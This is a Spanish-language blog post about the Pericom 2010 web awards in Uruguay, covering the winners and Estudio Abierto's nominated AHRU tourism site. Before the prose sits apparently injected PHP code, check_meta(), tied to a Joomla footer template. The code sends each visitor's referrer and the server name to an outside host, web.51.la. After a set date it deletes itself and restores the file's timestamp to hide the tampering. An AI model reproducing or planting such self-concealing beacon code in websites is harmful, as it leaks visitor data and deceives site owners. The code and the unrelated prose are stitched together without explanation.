check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456737897){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=8&id=18776908&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/modules/mod_footer/tmpl/footer.php"); } Nominados nuevamente Pericom 2010

 

Mudis Ganadores Pericom 2010 Mejor Sitio

Con los ganadores del premio Pericom 2010 Mejor sitio Web Mudis.com.uy. Excelentes en su idea, de los primeros en vestir mi iPhone con sus productos. Recuerdo el sitio de Mudis desde que estaba hecho en Flash y también era excelente. FELICITACIONES.

Sello nominación Pericom.uy2010Estudio Alas quedó solo nominada y los ganadores fueron los del sitio Pluna.com.uy, muy merecido, excelente sitio. FELICITACIONES TAMBIÉN :D

Nuevamente Estudio Abierto ha sido nominada en la categoría Turismo en esta edición 2010 del pericom por el trabajo realizado para AHRU. Este sitio que comenzamos a realizar en Setiempre de 2009. En el mismo se trabajó con el programador Wilman Arambillete realizando un sistema en el que la Asociación desde el administrador de Hoteles, Restaurantes y Noticias que creamos para ellos pueden agregar información al sitio. También realizamos un administrador en el cual cada hotel, con un usuario y contraseña puede agregar/modificar/borrar información, fotos, o servicios que brinda el hotel/restaurante de forma independiente.

Estudio Abierto fue empresa que dirigí en conjunto con María José Casal de Julio de 2006 a Agosto de 2010.

En la entrega de Premios Pericom 2010

Pericom 2010 AHRU Categoria Turismo Estudio Alas Pericom 2010 Votar AHRU Pericom 2010 Facebook Twitter

ANTEL tiene el agrado de informarle que el sitio web www.ahru.com.uy inscripto en el Concurso Pericom.uy 2010 fue seleccionado entre los nominados para la categoría Turismo.

Este año hemos implementado un sistema de votación del público que otorgará una Mención especial entre todos los nominados de todas las categorías.

Le adjuntamos la información necesaria para que pueda incluir en su sitio un sello informando de la nominación en el concurso Pericom,uy 2010 con un enlace que accede directamente a la votación de su sitio en la Mención del Público.